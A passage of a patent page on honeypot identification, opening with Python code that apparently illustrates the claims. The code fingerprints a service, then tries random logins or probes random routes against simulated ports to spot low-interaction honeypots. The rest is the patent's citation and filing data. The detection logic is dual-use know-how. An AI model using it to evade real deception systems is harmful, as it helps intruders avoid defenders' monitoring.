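    get: Callable[[str], Dict[str, str]] = lambda route: {}  # route -> fields incl. "body"


def interact(port: SimulatedPort, policy: str, attempts: int = 5) -> Dict[str, object]:
    """Claim 2: run the chosen policy and collect the interaction result."""
    if policy == "random_login":
        return {"logins": [port.login(u, p) for u, p in random_credentials(attempts)]}
    routes = [f"/probe-{i}-{secrets.token_hex(4)}" for i in range(attempts)]  # all distinct
    responses = [port.get(r) for r in routes]
    fields = {k: v for resp in responses for k, v in resp.items()}
    return {"responses": [r["body"] for r in responses], "fields": fields}


def meets_preset_condition(result: Dict[str, object], policy: str) -> Optional[str]:
    """Claim 3: which preset condition the result satisfies, or None."""
    if FIRST_PRESET_FIELD in (result.get("fields") or {}):
        return "first preset field present"
    if policy == "random_login" and result["logins"] and all(result["logins"]):
        return "all random-credential logins succeeded"
    if policy == "route_probe" and len(set(result["responses"])) == 1:
        return "identical responses for different routes"
    return None


def identify(scan_response: Dict[str, str], service: str, port: SimulatedPort) -> Tuple[bool, str]:
    """Full decision of claim 1: fingerprint first, then plug-in interaction."""
    hit = match_fingerprint(scan_response)
    if hit:
        return True, f"fingerprint match: {hit}"
    policy = select_policy(service)
    if policy is None:
        return False, "no identification plug-in for this service"
    reason = meets_preset_condition(interact(port, policy), policy)
    return (True, reason) if reason else (False, "no preset condition met")


# Constructed behaviours: a low-interaction honeypot that accepts any login and
# serves one page for every route, beside a realistic service for comparison.
HONEY_SSH = SimulatedPort(login=lambda u, p: True)
REAL_SSH = SimulatedPort(login=lambda u, p: (u, p) == ("ops", "correct horse"))
HONEY_HTTP = SimulatedPort(login=lambda u, p: False, get=lambda r: {"body": "<h1>Welcome</h1>"})
REAL_HTTP = SimulatedPort(login=lambda u, p: False, get=lambda r: {"body": f"404 Not Found: {r}"})
```

Because stage 2 judges only behaviour, a deployment that rejects random credentials and answers unknown routes distinctly passes this check; those are the two tells a honeypot operator can remove.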
CN202210269896.8A 2022-03-18 2022-03-18 Honeypot identification method, device, equipment and storage medium Active CN114826663B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202210269896.8A CN114826663B (en) 2022-03-18 2022-03-18 Honeypot identification method, device, equipment and storage medium

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202210269896.8A CN114826663B (en) 2022-03-18 2022-03-18 Honeypot identification method, device, equipment and storage medium

Publications (2)

Publication Number Publication Date
CN114826663A true CN114826663A (en) 2022-07-29
CN114826663B CN114826663B (en) 2023-12-01

Family

ID=82530610

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202210269896.8A Active CN114826663B (en) 2022-03-18 2022-03-18 Honeypot identification method, device, equipment and storage medium

Country Status (1)

Country Link
CN (1) CN114826663B (en)

Cited By (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN116094847A (en) * 2023-04-11 2023-05-09 中国工商银行股份有限公司 Honeypot identification method, honeypot identification device, computer equipment and storage medium
CN116668187A (en) * 2023-07-19 2023-08-29 杭州海康威视数字技术股份有限公司 Honeypot identification method and device and electronic equipment
CN117220900A (en) * 2023-07-14 2023-12-12 博智安全科技股份有限公司 Method and system for automatically detecting honeypot system
CN118138371A (en) * 2024-04-29 2024-06-04 杭州海康威视数字技术股份有限公司 Quick honey pot construction method, device and equipment based on search engine

Citations (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20050044418A1 (en) * 2003-07-25 2005-02-24 Gary Miliefsky Proactive network security system to protect against hackers
CN101669347A (en) * 2007-04-23 2010-03-10 国际商业机器公司 Method and apparatus for detecting port scans with fake source address
CN107330331A (en) * 2016-04-29 2017-11-07 阿里巴巴集团控股有限公司 There are the methods, devices and systems of the system of leak in identification
CN111651757A (en) * 2020-06-05 2020-09-11 深圳前海微众银行股份有限公司 Attack behavior monitoring method, device, equipment and storage medium
CN112217800A (en) * 2020-09-14 2021-01-12 广州大学 Honeypot identification method, system, device and medium
US10986129B1 (en) * 2019-03-28 2021-04-20 Rapid7, Inc. Live deployment of deception systems
CN113472819A (en) * 2021-09-03 2021-10-01 国际关系学院 Honeypot detection and identification method and device based on fingerprint characteristics

Non-Patent Citations (1)

* Cited by examiner, † Cited by third party
Title
史彦东: "Research on automatic generation of feature rules in intrusion deception ***", 电脑知识与技术, no. 15 *

Also Published As

Publication number Publication date
CN114826663B (en) 2023-12-01

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant